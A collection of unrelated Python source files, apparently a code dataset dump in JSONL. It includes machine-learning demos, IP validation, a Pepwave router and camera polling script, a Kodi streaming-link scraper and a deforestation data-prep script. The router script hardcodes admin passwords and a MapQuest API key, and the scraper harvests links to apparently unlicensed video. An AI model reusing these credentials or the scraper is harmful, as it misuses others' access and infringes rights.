1)\n subdataSet.append(dataSet[index])\n return subdataSet\n\n\n# 分割数据集\ndef data_spilt(dataSet, index, value):\n left = []\n right = []\n for row in dataSet:\n if row[index] < value:\n left.append(row)\n else:\n right.append(row)\n return left, right\n\n\n# 计算分割代价\ndef spilt_loss(left, right, class_values):\n loss = 0.0\n for class_value in class_values:\n left_size = len(left)\n if left_size != 0: # 防止除数为零\n prop = [row[-1] for row in left].count(class_value) / float(left_size)\n loss += (prop * (1.0 - prop))\n right_size = len(right)\n if right_size != 0:\n prop = [row[-1] for row in right].count(class_value) / float(right_size)\n loss += (prop * (1.0 - prop))\n return loss\n\n\n# 选取任意的n个特征,在这n个特征中,选取分割时的最优特征\ndef get_best_spilt(dataSet, n_features):\n features = []\n class_values = list(set(row[-1] for row in dataSet))\n b_index, b_value, b_loss, b_left, b_right = 999, 999, 999, None, None\n while len(features) < n_features:\n index = randrange(len(dataSet[0]) - 1)\n if index not in features:\n features.append(index)\n for index in features: # 找到列的最适合做节点的索引,(损失最小)\n for row in dataSet:\n left, right = data_spilt(dataSet, index, row[index]) # 以它为节点的,左右分支\n loss = spilt_loss(left, right, class_values)\n if loss < b_loss: # 寻找最小分割代价\n b_index, b_value, b_loss, b_left, b_right = index, row[index], loss, left, right\n return {'index': b_index, 'value': b_value, 'left': b_left, 'right': b_right}\n\n\n# 决定输出标签\ndef decide_label(data):\n output = [row[-1] for row in data]\n return max(set(output), key=output.count)\n\n\n# 子���割,不断地构建叶节点的过程对对对\ndef sub_spilt(root, n_features, max_depth, min_size, depth):\n left = root['left']\n right = root['right']\n del (root['left'])\n del (root['right'])\n if not left or not right:\n root['left'] = root['right'] = decide_label(left + right)\n return\n if depth > max_depth:\n root['left'] = decide_label(left)\n root['right'] = decide_label(right)\n return\n if len(left) < min_size:\n root['left'] = decide_label(left)\n else:\n root['left'] = get_best_spilt(left, n_features)\n sub_spilt(root['left'], n_features, max_depth, min_size, depth + 1)\n if len(right) < min_size:\n root['right'] = decide_label(right)\n else:\n root['right'] = get_best_spilt(right, n_features)\n sub_spilt(root['right'], n_features, max_depth, min_size, depth + 1)\n\n\n# 构造决策树\ndef build_tree(dataSet, n_features, max_depth, min_size):\n root = get_best_spilt(dataSet, n_features)\n sub_spilt(root, n_features, max_depth, min_size, 1)\n return root\n\n\n# 预测测试集结果\ndef predict(tree, row):\n predictions = []\n if row[tree['index']] < tree['value']:\n if isinstance(tree['left'], dict):\n return predict(tree['left'], row)\n else:\n return tree['left']\n else:\n if isinstance(tree['right'], dict):\n return predict(tree['right'], row)\n else:\n return tree['right']\n # predictions=set(predictions)\n\n\ndef bagging_predict(trees, row):\n predictions = [predict(tree, row) for tree in trees]\n return max(set(predictions), key=predictions.count)\n\n\n# 创建随机森林\ndef random_forest(train, test, ratio, n_feature, max_depth, min_size, n_trees):\n trees = []\n for i in range(n_trees):\n train = get_subsample(train, ratio) # 从切割的数据集中选取子集\n tree = build_tree(train, n_feature, max_depth, min_size)\n trees.append(tree)\n predict_values = [bagging_predict(trees, row) for row in test]\n return predict_values\n\n\n# 计算准确率\ndef accuracy(predict_values, actual):\n correct = 0\n for i in range(len(actual)):\n if actual[i] == predict_values[i]:\n correct += 1\n return correct / float(len(actual))\n\n\ndef AUC(label, pre):\n # 计算正样本和负样本的索引,以便索引出之后的概率值\n pos = [i for i in range(len(label)) if label[i] == 1]\n neg = [i for i in range(len(label)) if label[i] == 0]\n auc = 0\n for i in pos:\n for j in neg:\n if pre[i] > pre[j]:\n auc += 1\n elif pre[i] == pre[j]:\n auc += 0.5\n return auc / (len(pos) * len(neg))\n\n\nif __name__ == '__main__':\n seed(1)\n column_to_float(dataSet) # dataSet\n n_folds = 3\n max_depth = 5\n min_size = 2\n ratio = 1.0\n n_features = 3\n n_trees = 4\n folds = spiltDataSet(dataSet, n_folds) # 先是切割数据集\n scores = []\n for fold in folds:\n train_set = folds[:]\n train_set.remove(fold) # 选好训练集\n train_set = sum(train_set, []) # 将多个fold列表组合成一个train_set列表\n test_set = []\n for row in fold:\n row_copy = list(row)\n row_copy[-1] = None\n test_set.append(row_copy)\n actual = [row[-1] for row in fold]\n predict_values = random_forest(train_set, test_set, ratio, n_features, max_depth, min_size, n_trees)\n accur = AUC(label=actual, pre=predict_values)\n print(\"accur\", accur)\n scores.append(accur)\n\n print('Trees is %d' % n_trees)\n print('AUC:%s' % scores)\n print('mean AUC:%s' % (sum(scores) / float(len(scores))))\n","sub_path":"business/p201908/700/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"526103178","text":"import scipy\nfrom scipy import integrate\nimport random\nimport pylab\n\n\ndef gaus(x, mu, sigma):\n part1 = 1 / (sigma * (2 * scipy.pi) ** 0.5)\n ePower = (-(x - mu) ** 2) / (2 * (sigma) ** 2)\n part2 = scipy.e ** ePower\n return part1 * part2\n\n\ndef normal_distibution(mean=0, sigma=1, nPoints=1000000, bins=1000):\n \"\"\"plots a bell curve with n points\"\"\"\n points = [random.gauss(mean, sigma) for _ in range(nPoints)]\n pylab.figure()\n pylab.hist(points, bins=bins)\n\n\ndef empirical_rule(fnc, mu, sigma):\n \"\"\"integrates provided function over 1, 2, and 3 SD intervals\"\"\"\n fncArgs = (mu, sigma)\n results = []\n for iSigma in range(1, 4, 1):\n delta = iSigma * sigma\n a, b = mu - delta, mu + delta\n results.append(scipy.integrate.quad(fnc, a, b, fncArgs))\n print(*results, sep=\"\\n\")\n print(\"Expected: 68-95-99.7\")\n\n\nif __name__ == \"__main__\":\n empirical_rule(gaus, 0, 10)\n pylab.show()\n","sub_path":"src/prob_and_distros/normal_distribution.py","file_name":"normal_distribution.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"188735016","text":"from ip_suite import IPSuite as IPSuite\nimport sys\n\nclass Solution:\n def main(self):\n given = \"\"\n while not given:\n given = str(input(\"Please enter a valid IPV4 address in the form of IP/mask: (enter q to quit) \"))\n if given == \"q\":\n sys.exit(0)\n else:\n if IPSuite.validateInput(given):\n ip, mask = given.split(\"/\")\n ipClass = IPSuite.getIPClass(ip)\n ipDesignation = IPSuite.getIPDesignation(ip)\n if ipClass and ipDesignation:\n print(\"IP: {} \\nSubnet Mask: {} \\nClass: {} \\nDesignation: {} \\n\".format(ip, mask, ipClass, ipDesignation))\n else:\n print(\"Something went wrong! \\n\")\n sys.exit(0)\n else:\n given = \"\"\n\nif __name__ == '__main__':\n Solution().main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"40683370","text":"# Copyright 2014 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom collector.test.base import BaseTest\n\nfrom collector.api.common.util import build_index\nfrom collector.api.common.util import get_index\nfrom collector.api.common.util import split_collection\nfrom six.moves import xrange\n\n\nclass Indexed(object):\n \"\"\"Helper object for testing indexing of objects\n \"\"\"\n def __init__(self, **kwds):\n self.__dict__.update(kwds)\n\n\nclass TestUtil(BaseTest):\n\n def test_split_collection(self):\n coll = list(xrange(3))\n chunks = list(split_collection(coll, chunk_size=len(coll)))\n self.assertEqual(1, len(chunks))\n self.assertListEqual(chunks[0], coll)\n\n chunks = list(split_collection(coll, chunk_size=len(coll) + 1))\n self.assertEqual(1, len(chunks))\n self.assertListEqual(chunks[0], coll)\n\n chunks = list(split_collection(coll, chunk_size=len(coll) - 1))\n self.assertEqual(2, len(chunks))\n self.assertListEqual(chunks[0], coll[:-1])\n self.assertListEqual(chunks[1], coll[-1:])\n\n def test_build_index(self):\n coll = [\n {'id': 1, 'cd': 2, 'msg': 'm'},\n {'id': 1, 'cd': 2, 'msg': 'm'},\n Indexed(**{'id': 1, 'cd': 3, 'msg': 'm'}),\n Indexed(**{'id': 2, 'cd': 4, 'msg': 'm'})\n ]\n\n index = build_index(coll, 'id')\n self.assertEqual(2, len(index))\n self.assertEqual(coll[2], index[(1,)])\n self.assertEqual(coll[3], index[(2,)])\n\n index = build_index(coll, 'id', 'cd')\n self.assertEqual(3, len(index))\n self.assertDictEqual(coll[1], index[(1, 2)])\n self.assertEqual(coll[2], index[(1, 3)])\n self.assertEqual(coll[3], index[(2, 4)])\n\n def test_get_index(self):\n checks = [\n (Indexed(**{'one': 1, 'two': 2}), ('one', ), (1,)),\n (Indexed(**{'one': 1, 'two': 2}), ('one', 'two'), (1, 2)),\n (Indexed(**{'one': 1, 'two': 2}), (), ()),\n ]\n for obj, fields, idx in checks:\n self.assertTupleEqual(\n idx,\n get_index(obj, *fields)\n )\n","sub_path":"collector/collector/test/common/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"258466755","text":"# -*- coding: utf-8 -*-\n\n'''\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n'''\n\nimport re, urllib, urlparse, json\n\nfrom resources.lib.modules import cleantitle\nfrom resources.lib.modules import client, source_utils\n\n\nclass source:\n def __init__(self):\n self.priority = 1\n self.language = ['en']\n self.domains = ['watchepisodes.com', 'watchepisodes.unblocked.pl']\n self.base_link = 'http://www.watchepisodes4.com/'\n self.search_link = 'search/ajax_search?q=%s'\n\n def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):\n try:\n url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}\n url = urllib.urlencode(url)\n return url\n except BaseException:\n return\n\n def episode(self, url, imdb, tvdb, title, premiered, season, episode):\n try:\n if url is None:\n return\n\n url = urlparse.parse_qs(url)\n url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])\n url['title'], url['premiered'], url['season'], url['episode'] = title, premiered, season, episode\n url = urllib.urlencode(url)\n return url\n except BaseException:\n return\n\n def sources(self, url, hostDict, hostprDict):\n sources = []\n try:\n if url is None:\n return sources\n\n data = urlparse.parse_qs(url)\n data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])\n title = data['tvshowtitle']\n hdlr = 's%02de%02d' % (int(data['season']), int(data['episode']))\n\n query = urllib.quote_plus(cleantitle.getsearch(title))\n surl = urlparse.urljoin(self.base_link, self.search_link % query)\n r = client.request(surl, XHR=True)\n r = json.loads(r)\n r = r['series']\n for i in r:\n tit = i['value']\n if not cleantitle.get(title) == cleantitle.get(tit): raise Exception()\n slink = i['seo']\n slink = urlparse.urljoin(self.base_link, slink)\n\n r = client.request(slink)\n if not data['imdb'] in r: raise Exception()\n data = client.parseDOM(r, 'div', {'class': 'el-item\\s*'})\n epis = [client.parseDOM(i, 'a', ret='href')[0] for i in data if i]\n epis = [i for i in epis if hdlr in i.lower()][0]\n r = client.request(epis)\n links = client.parseDOM(r, 'a', ret='data-actuallink')\n for url in links:\n try:\n valid, host = source_utils.is_host_valid(url, hostDict)\n if not valid: raise Exception()\n sources.append({'source': host, 'quality': 'SD', 'language': 'en', 'url': url, 'direct': False, 'debridonly': False})\n except BaseException:\n return sources\n\n return sources\n except BaseException:\n return sources\n\n def resolve(self, url):\n return url\n","sub_path":"HAX/18.CocoJoe/script.module.lambdascrapers/lib/lambdascrapers/sources_overeasy/en/watchepisodes.py","file_name":"watchepisodes.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596668427","text":"import sys\nfrom boto.s3.connection import S3Connection\nimport argparse \nimport json\nBUCKETNAME = \"aisoftwareresearch\"\n\ndef main():\n #define arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-a','--access_key_id', required=True, help='aws_access_key_id')\n parser.add_argument('-s','--secret_access_key', required=True, help='aws_secret_access_key')\n #parser.add_argument('-f','--s3_folder_name', required=True, help='folder name in S3')\n #binding the variables \n args = parser.parse_args()\n \n extraction = \"productprice\"\n qual_name = \"productprice\"\n #print args\n conn = S3Connection(args.access_key_id, args.secret_access_key)\n \n b = conn.get_bucket(BUCKETNAME)\n #key = b.get_key(\"extractions/%s/qualification/config/qual_%s.json\" % (extraction, qual_name))\n #b.get_key(\"\" + s3_folder_name + \"Qualification/config/qual_eyehair.json\")\n key = b.get_key(\"extractions/eyehair/qualification/config/qual_eyehair.json\")\n\n #key = (\"qual_eyehair.json\")\n data = key.get_contents_as_string()\n #sprint data\n JSONdata = json.loads(data)\n createHTML(b, JSONdata)\n\ndef createHTML(b, JSONdata):\n sentence = JSONdata[\"sentence\"]\n columnIndex = {}\n columns = []\n for category in JSONdata[\"categories\"]:\n columnIndex[category[\"label\"]] = int(category[\"position\"])-1\n columns.append(category[\"label\"])\n content = \"\"\n\n for l in range(0, len(sentence)):\n annotations = JSONdata[\"sentence\"][l][\"annotations\"]\n explanation = JSONdata[\"sentence\"][l][\"explanation\"][\"wrong\"][\"text\"]\n contents = \"\"\n\n if(annotations == \"no\"):\n contents += \"\"\"

Incorrect.
The correct anwser is:

Explanation: \"\"\"+explanation+\"\"\"

\"\"\"\n else:\n SELECTED=\"checked='checked'\"\n UNSELECTED=\"disabled\"\n visibility = [UNSELECTED] * len(columnIndex)\n auxCategories = \"\"\n\n for i in range(0, len(JSONdata[\"categories\"])):\n auxCategories += JSONdata[\"categories\"][i][\"label\"]+ \",\"\n categories = auxCategories.split(\",\")\n categories = categories[:-1]\n options = \"\" \n answers = []\n counter = 12\n for (category, tabvalues) in JSONdata[\"sentence\"][l][\"answer\"].iteritems():\n\n for answer in tabvalues.split('\\t'):\n if (answer != \"\"):\n options += \"\"\"
\"\"\"+answer+\"\"\"
\"\"\"\n if (counter == 1):\n counter = 12\n counter -= 1\n visibility = [UNSELECTED] * len(columnIndex)\n visibility[columnIndex[category]] = SELECTED\n for v,c in zip(visibility, columns):\n options += \"\"\"\"\"\"\n options += \"\"\"
\"\"\"\n contents += \"\"\"

Incorrect.
The correct answer is:

\"\"\"+ options +\"\"\"

Explanation: \"\"\"+explanation+\"\"\"

\"\"\"\n JSONdata[\"sentence\"][l][\"explanation\"][\"wrong\"][\"code\"] = contents\n\n #uploadToS3(b, HTMLContent)\n with open('output_qual_eyehair.json', 'w') as f:\n json.dump(JSONdata, f, sort_keys = True, indent= 4)\n\ndef uploadToS3( b, HTMLContent):\n k = b.new_key(\"Qualification/config/output_qual_eyehair.html\")\n k.content_type = 'text/html'\n k.set_contents_from_string(HTMLContent)\n\n# call main() if this is run as standalone\nif __name__ == \"__main__\":\n sys.exit(main())","sub_path":"z-attic/qualification/z-attic/explanationGenerator_final.py","file_name":"explanationGenerator_final.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"641807022","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@File:test01_ip排序.py \n@E-mail:364942727@qq.com\n@Time:2019-12-17 15:07 \n@Author:Nobita \n@Version:1.0 \n@Desciption:test01_ip排序题\n\"\"\"\n\nimport re\n\n#题目:要求返回一个ip数组,并且按照ip最后一位排序返回\nstring = \"192.0.0.1?!289.0.0.1!0.0.0.0!192.163.10.28?192.0.0.1\"\n'''\n思路分析:\n1.首先去除特殊符号后返回一个列表str_list\n2.判断列表里的每个元素是否符合ip的格式,不符合去除\n3.得到满足ip格式的新列表new_list,按照ip最后一位排序返回result\n'''\n\nif __name__ == '__main__':\n str_list = re.split('\\?!|!|\\?', string)\n '''通过正则去除特殊符号,返回str_list'''\n new_list = []\n for ip in str_list:\n ip_list = ip.split('.')\n if len(ip_list) == 4:\n for i in ip_list:\n if eval(i) > 255 or eval(i) < 0:\n break\n else:\n new_list.append(ip)\n '''\n 思路分析:\n 1.遍历列表str_list,判断ip是否为X.X.X.X格式。\n 2.满足ip格式,再判断里面的数值是否在0-255之间。\n 3.均满足则追加这个ip到新的列表new_list中。\n '''\n\n result = sorted(new_list, key=lambda x: x[-1])\n '''对列表net_list按照ip最后一位数字进行排序'''\n print(result)\n","sub_path":"test01_ip排序.py","file_name":"test01_ip排序.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"104170614","text":"import os\nimport json\nimport requests\nimport sys\nimport time\nimport urllib3, urllib\nfrom requests.auth import HTTPDigestAuth\n\ndef login(url):\n endpoint = url + '/login'\n payload = {\"username\":\"admin\", \"password\":\"admin12345\"}\n header = {\"content-type\":\"application/json\"}\n session = requests.Session()\n response = session.post(endpoint, data=json.dumps(payload), headers=header, verify=False)\n cookies = response.cookies.get_dict()\n sessionid = cookies[\"bauth\"]\n return sessionid\n\ndef logout(url, sessionid):\n endpoint = url + '/logout'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.post(endpoint, headers=header, verify=False)\n\ndef get_wan(url, sessionid):\n endpoint = url + '/status.wan.connection'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n return(response_json)\n\ndef get_gps(url, sessionid):\n endpoint = url + '/info.location'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n return response_json['location']\n\ndef get_client(url, sessionid):\n endpoint = url + '/status.client'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n client_list = []\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n for i in response_json.values():\n client_list += i\n for i in client_list:\n if i['active']:\n print(i['ip'] + ' ' + i['connectionType'] + ' active: true')\n return(client_list)\n\ndef get_bandwidth(url, sessionid):\n endpoint = url + '/status.wan.connection.allowance'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n return(response_json)\n\ndef post_sms(url, sessionid):\n endpoint = url + '/cmd.sms.sendMessage'\n payload = {\"address\":\"+12533349251\", \"content\":\"Alert Tripwires\"}\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.post(endpoint, data=json.dumps(payload), headers=header, verify=False)\n response_json = response.json()\n return(response_json)\n\ndef get_sms(url, sessionid):\n endpoint = url + '/cmd.sms.get?connId=2'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.post(endpoint, headers=header, verify=False)\n response_json = response.json()\n return(response_json)\n\ndef get_ssid(url, sessionid):\n endpoint = url + '/config.ssid.profile'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n return(response_json)\n\ndef get_cam_type(ip):\n payload = {'action': 'getConfig', 'name': 'ChannelTitle'}\n user = 'admin'\n password = 'admin12345'\n param = urllib.parse.urlencode(payload, quote_via=urllib.parse.quote)\n cam_url = 'http://%s/cgi-bin/configManager.cgi?' % ip\n cam_resp = requests.get(cam_url, params=param, auth=HTTPDigestAuth(user, password), stream=False)\n cam_json = json.dumps(cam_resp.text)\n cam_list = cam_json.split('\\\\r\\\\n', 4)\n cam_list.remove('\"')\n sorted_cam = []\n for i in cam_list:\n sorted_cam.append(i.split('=', 1)[1])\n return sorted_cam\n #for i in cam_list:\n # print(i)\n #cam_list.append(cam_resp.text.rstrip())\n #for i in cam_list:\n # print('This is line' + i)\n #print(json.dumps(cam_resp.text))\n\ndef get_geocode(lat, lon):\n key = '9C8OSEmL77jB3BJNkatauCGTA9O8u9BR'\n #Original url with metadata and intersection which we don't need it.\n #url = 'http://www.mapquestapi.com/geocoding/v1/reverse?key=%s&location=%s,%s&includeRoadMetadata=true&includeNearestIntersection=true' % (key, lat, lon)\n url = 'http://www.mapquestapi.com/geocoding/v1/reverse?key=%s&location=%s,%s' % (key, lat, lon)\n print(url)\n response = requests.get(url)\n response_json = response.json()\n return(response_json['results'][0]['locations'][0])\n\ndef write_dict_to_json(datasets, file_name):\n #Convert datasets dict to list json\n cur_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n rows_tojson = []\n for k,v in datasets.items():\n row_tojson = {\n 'id': k,\n 'ip': v['ip'],\n 'lat': v['lat'],\n 'lon': v['lon'],\n 'address': v['address'],\n 'cam1': v['cam1'], \n 'cam2': v['cam2'], \n 'cam3': v['cam3'], \n 'cam4': v['cam4'], \n 'systime': cur_time\n }\n rows_tojson.append(row_tojson)\n with open(file_name, 'w') as gpsjsonfile:\n json.dump(rows_tojson, gpsjsonfile, indent=4)\n\ndef main():\n urllib3.disable_warnings()\n context = {}\n #ip_file = open('tesla_ips_2.txt')\n ip_file = open(sys.argv[1])\n file_name = sys.argv[2]\n ip_lines = ip_file.readlines()\n for line in ip_lines:\n ip = line.rstrip()\n cam_type = get_cam_type(ip)\n url = 'https://%s:8443/api' % ip\n sessionid = login(url)\n print(ip)\n responsejson = (get_gps(url, sessionid))\n #print(responsejson)\n #print('lat: ' + str(responsejson['latitude']) + 'lon: ' + str(responsejson['longitude']))\n lat = str(responsejson['latitude'])\n lon = str(responsejson['longitude'])\n responsejson = get_geocode(responsejson['latitude'], responsejson['longitude'])\n #print(responsejson)\n address = responsejson['street'] + ', ' + responsejson['adminArea5'] + ' ' + responsejson['adminArea3'] + ' ' + responsejson['postalCode']\n responsejson = get_ssid(url, sessionid)\n #print(responsejson)\n ssid = responsejson['1']['name']\n context.update({ssid[-4:]: {'ip': ip, 'lat': lat, 'lon': lon, 'address': address, 'cam1': cam_type[0], 'cam2': cam_type[1], 'cam3': cam_type[2], 'cam4': cam_type[3]}})\n logout(url, sessionid)\n write_dict_to_json(context, file_name)\n\nif __name__ == '__main__':\n main()\n","sub_path":"py_pepwave_inject.py","file_name":"py_pepwave_inject.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"392659256","text":"import numpy as np\nimport matplotlib.pyplot as plt\nj=np.complex(0,1)\na=input(\"enter length of input\")\na1=input(\"enter length of input\")\nN=a+a1-1\nprint(N)\nx2=[]\nx1=[]\nfor b in range(0,a):\n\tc=input(\"enter value\")\n\tx1.append(c)\nprint(x1)\nfor b1 in range(0,a1):\n\tc1=input(\"enter value\")\n\tx2.append(c1)\nprint(x2)\ny=np.zeros(a+a1-1)\nfor i in range(0,N):\n\tfor k in range(0,a):\n\t\tif((i-k)>=0 and (i-k)<=2):\n\t\t\ty[i]=y[i]+(x1[k]*x2[i-k])\nplt.subplot(311)\nplt.stem(x1)\nplt.subplot(312)\nplt.stem(x2)\nplt.subplot(313)\nplt.stem(y)\nplt.show()\nprint(y)\n","sub_path":"con2.py","file_name":"con2.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"574840850","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule takes data extraction from GLUE and combines into one long spreadsheet\n\"\"\"\n\n#==============================================================================\n# Imports and id correct data path\n#==============================================================================\nimport sys\nsys.path.append('C:/Users/rheil/dev/glue-sb/')\nimport pandas as pd\nimport numpy as np\nimport dirfuncs\nimport gc\nimport geopandas as gpd\nimport pysal as ps\ndropbox_dir = dirfuncs.guess_dropbox_dir()\n\ndata_dir = dropbox_dir + 'soyM/glue_data_package/3-18_Amazon_Cerrado/'\nout_dir = dropbox_dir + 'soyM/analysis/3-18/'\n\n#==============================================================================\n# Define functions for testing\n#==============================================================================\ndef isPositive(series, tolerance = 0):\n \"\"\"\n Checks whether all values in a series are positive\n \"\"\"\n series = series.dropna()\n if (series >= 0 - tolerance).all():\n pass\n else:\n raise ValueError(\"Not all entries are positive: \" + series.name)\n \ndef isShare(series, tolerance = 0):\n \"\"\"\n Checks whether all values in a series are between 0 and 1\n \"\"\"\n series = series.dropna()\n if (series >= 0 - tolerance).all():\n pass\n else:\n raise ValueError(\"Not all entries are positive: \" + series.name)\n if (series <= 1 + tolerance).all():\n pass\n else:\n raise ValueError(\"Not all entries are less than 1: \" + series.name) \n\ndef isSame(seriesA, seriesB, tolerance = 0):\n \"\"\"\n Checks whether all values in two series are the same (given\n a tolerance for minor errors)\n \"\"\"\n dif = np.abs(seriesA - seriesB) \n dif = dif.dropna()\n if (dif > tolerance).all():\n raise ValueError(\"Series aren't the same: \" + seriesA.name, seriesB.name)\n else:\n pass\n \n##==============================================================================\n## create attribute csv\n##==============================================================================\n#orig_data_csvs = [data_dir + 'dataset_part1.csv',\n# data_dir + 'dataset_part2.csv',\n# data_dir + 'dataset_part3.csv']\n#n_csv = len(orig_data_csvs)\n#data_list = [pd.read_csv(orig_data_csvs[i]) for i in range(n_csv)]\n#\n#data_df = pd.merge(data_list[0], data_list[1], left_on = 'projectid', \n# right_on = 'projectid', how = 'left')\n#for i in range(2,n_csv):\n# data_df = pd.merge(data_df, data_list[i], left_on = 'projectid', \n# right_on = 'projectid', how = 'left')\n#\n#keep_cols = ['projectid', 'munic_code', 'state', 'Amdist', 'roadskm', \n# 'urbankm', 'indig', 'prot_us', 'prot_pi', 'suitarea', \n# 'verysuit', 'step2duplicatetoremove', 'step3incra', \n# 'step4dremovesmaller25pct', 'amareaha', 'cerha', 'PRODES_non_coverage_area'] # Add potential covariates\n#stubs = ['soycotton', 'soydouble', 'soysingle']\n#for stub in stubs:\n# keep_cols.extend([col for col in data_df.columns if stub in col])\n#data_df = data_df[keep_cols] \n#data_df.to_csv(data_dir + 'orig_data.csv')\n \n#==============================================================================\n# Define input datasets\n#==============================================================================\ndata_csv = data_dir + 'property_variables.csv'\npt_csv = data_dir + 'pt_extract.csv'\n\n#==============================================================================\n# Load data\n#==============================================================================\nheader = pd.read_csv(data_csv, engine = 'python', nrows = 1)\n\nkeep_cols = ['propertyid', 'municcode', 'amdist', 'state', 'cerdist', 'roaddist', \n 'urbandist', 'indig', 'protus', 'protpi', 'suit', 'verysuit', \n 'amprodesha', 'amnonprodesha', 'cerha', 'propareahafinal',\n 'for00amprodes', 'nonforveg00amprodes', 'for00amnonprodes', 'nonforveg00amnonprodes',\n 'for00cer', 'nonforveg00cer', 'amsoy01', 'amsoy07', 'amsoy15', \n 'cersoy01', 'cersoy07', 'cersoy14'] # Add potential covariates\n\nstubs = ['foramprodes', 'foramnonprodes', 'vegamprodes', \n 'vegamnonprodes', 'forcer', 'vegcer']\nfor stub in stubs:\n keep_cols.extend([col for col in header.columns if ((col.startswith('de20') | col.startswith('soyam15de20') | col.startswith('soycer14de20')) & (stub in col))])\n\nstubs = ['veg', 'for']\nfor stub in stubs:\n keep_cols.extend([col for col in header.columns if ((col.startswith('soycer14de20')) & (stub in col))])\n\nstubs = ['soycotton', 'soydouble', 'soysingle', 'cersoy', 'amsoy']\nfor stub in stubs:\n keep_cols.extend([col for col in header.columns if (col.startswith(stub)) & (stub in col)])\n\n\n#data_df = pd.read_csv(data_csv, nrows = 10000, engine = 'python', na_values = 'na',\n# usecols = keep_cols)\ndata_df = pd.read_csv(data_csv, engine = 'python', na_values = 'na',\n usecols = keep_cols)\n\n#data_dict = {key: pd.read_csv(data_csv) for key, data_csv in data_csvs.items()}\n#data_dict['as_2007'] = data_dict['as_2007'][['projectid', 'am07', 'cer07']]\n#data_dict['as_2001'] = data_dict['as_2001'][['projectid', 'am01', 'cer01']]\n#data_dict['weather'] = data_dict['weather'].rename(columns = {col: \\\n# col.replace('precip', 'precip_20') for col in data_dict['weather'].columns if 'precip' in col})\n#data_dict['weather'] = data_dict['weather'].rename(columns = {col: \\\n# col.replace('celcius', 'temp_20') for col in data_dict['weather'].columns if 'celcius' in col})\n##data_df = pd.merge(data_dict['orig'], data_dict['cer_dist'], left_on = 'projectid', \n## right_on = 'projectid', how = 'left')\n##data_df = pd.merge(data_dict['orig'], data_dict['cer_dist'], left_on = 'projectid', \n## right_on = 'projectid', how = 'left')\n##data_df = pd.merge(data_dict['orig'], data_dict['cer_dist'], left_on = 'projectid', \n## right_on = 'projectid', how = 'left')\n##data_df = pd.merge(data_dict['orig'], data_dict['cer_dist'], left_on = 'projectid', \n## right_on = 'projectid', how = 'left')\n#data_df = data_dict['orig']\n#del data_dict['orig']\n#for key, df in data_dict.items():\n# data_df = pd.merge(data_df, df, left_on = 'projectid', \n# right_on = 'projectid', how = 'left')\n# \n#del data_dict\n\n##==============================================================================\n## Simple tests on data\n##==============================================================================\n#years = [str(i).zfill(2) for i in range(1, 16)]\n#for y in years:\n# isSame(data_df['de' + y], (data_df['deamprodes' + y] + \\\n# data_df['deamnonprodes' + y] + data_df['decer' + y]), 0)\n# \n##suffixes = ['', 'amprodes', 'amnonprodes', 'cer']\n##for suffix in suffixes:\n## test_series = data_df['de' + suffix + '01'] - \\\n## (data_df['for00' + suffix] + 